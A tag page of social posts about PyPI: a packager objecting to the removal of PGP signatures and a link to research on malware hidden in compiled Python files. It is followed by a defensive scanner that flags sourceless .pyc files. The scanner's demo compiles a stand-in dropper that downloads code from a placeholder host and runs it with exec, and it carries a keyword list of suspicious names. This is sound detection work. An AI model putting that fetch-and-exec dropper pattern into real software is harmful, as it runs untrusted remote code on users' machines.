Items tagged with: pypi


It seems we'll have a lot of "fun" with the #PyPi decision to remove signatures for sdist tarballs (https://blog.pypi.org/posts/2023-05-23-removing-pgp/) going forward.

To scream into the void: Yes, PyPI, someone was using those signatures. Distro package maintainers secured user supply chains with it!

I'm not looking forward to asking dozens of upstreams to host their signatures elsewhere (just stumbled across one case). Meanwhile reproducibility is now broken for those packages.

#ArchLinux #packagerlife #Python


ReversingLabs has identified a novel attack on #PyPI using compiled #Python code to evade detection in the #SupplyChain: https://www.reversinglabs.com/blog/when-python-bytecode-bites-back-who-checks-the-contents-of-compiled-python-files
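The ReversingLabs finding above turns on one gap: most package scanners look at .py source, so a payload shipped only as a .pyc can slip by. The scanner below is an added example (not code from ReversingLabs or from the post) showing the check a reviewer would want: walk a package tree, flag any .pyc that has no matching .py source, and list which names the bytecode references so a dropper-style pattern (fetch, base64-decode, exec) stands out without executing anything. The package layout, the SUSPICIOUS_NAMES list and the "dropper" source are constructed for the demo and are assumptions, not data from the article.

```python
"""Find sourceless .pyc files in a package tree and report what they reference.

Added example: not code from the linked article. The .pyc header layout
(16 bytes: magic, flags, mtime, size) is the CPython 3.7+ format.
"""
import importlib.util
import marshal
import os
import tempfile
import types

# Assumption: a starting heuristic for a code reviewer, not a complete list.
SUSPICIOUS_NAMES = {"exec", "eval", "compile", "urlopen", "b64decode",
                    "system", "Popen", "socket", "loads"}


def write_pyc(path, source, filename="<constructed>"):
    """Compile `source` and write it as a .pyc for the running interpreter."""
    code = compile(source, filename, "exec")
    header = (importlib.util.MAGIC_NUMBER          # 4-byte interpreter magic
              + (0).to_bytes(4, "little")          # flags: timestamp-based pyc
              + (0).to_bytes(4, "little")          # source mtime (unused here)
              + len(source.encode()).to_bytes(4, "little"))  # source size
    with open(path, "wb") as f:
        f.write(header + marshal.dumps(code))


def load_pyc(path):
    """Return the top-level code object of a .pyc without executing it.

    Caveat: marshal.loads does not run the code, but it is not hardened
    against hostile input. Run a scanner like this in an isolated environment.
    """
    with open(path, "rb") as f:
        data = f.read()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc magic does not match the running interpreter")
    return marshal.loads(data[16:])


def walk_code(code):
    """Yield `code` and every nested code object (functions, classes, lambdas)."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)


def referenced_names(code):
    """Collect every global/attribute name the bytecode loads or stores."""
    names = set()
    for c in walk_code(code):
        names.update(c.co_names)
    return names


def find_sourceless_pyc(root):
    """Report each .pyc under `root` that has no sibling .py source."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".pyc"):
                continue
            pyc = os.path.join(dirpath, name)
            stem = name.split(".")[0]
            # __pycache__/foo.cpython-311.pyc belongs to ../foo.py;
            # a loose foo.pyc belongs to foo.py in the same directory.
            if os.path.basename(dirpath) == "__pycache__":
                src = os.path.join(os.path.dirname(dirpath), stem + ".py")
            else:
                src = os.path.join(dirpath, stem + ".py")
            if os.path.exists(src):
                continue  # bytecode cache for visible source: not our concern
            try:
                names = referenced_names(load_pyc(pyc))
            except ValueError as exc:
                # A foreign-version .pyc is still sourceless: flag it, don't skip it.
                findings.append({"path": pyc, "error": str(exc), "suspicious": set()})
                continue
            findings.append({"path": pyc, "error": None,
                             "suspicious": names & SUSPICIOUS_NAMES})
    return findings


def demo():
    """Build a constructed package with one benign cache and one sourceless .pyc."""
    with tempfile.TemporaryDirectory() as root:
        pkg = os.path.join(root, "pkg")
        os.makedirs(os.path.join(pkg, "__pycache__"))
        util_src = "def add(a, b):\n    return a + b\n"
        with open(os.path.join(pkg, "util.py"), "w") as f:
            f.write(util_src)
        write_pyc(os.path.join(pkg, "__pycache__", "util.cpython-311.pyc"), util_src)
        # Constructed stand-in for a dropper; it is compiled, never executed.
        dropper_src = ("import base64\nfrom urllib.request import urlopen\n"
                       "exec(compile(base64.b64decode(urlopen('http://example.invalid')"
                       ".read()), '<x>', 'exec'))\n")
        write_pyc(os.path.join(pkg, "_helpers.pyc"), dropper_src)
        return find_sourceless_pyc(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], finding["error"] or sorted(finding["suspicious"]))
```

Running it reports only pkg/_helpers.pyc, with exec, compile, urlopen and b64decode referenced; the cached util bytecode is ignored because its source is present. The heuristic is deliberately coarse: the point is to surface files that deserve a human disassembly (dis.dis on the loaded code object), not to classify them automatically.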
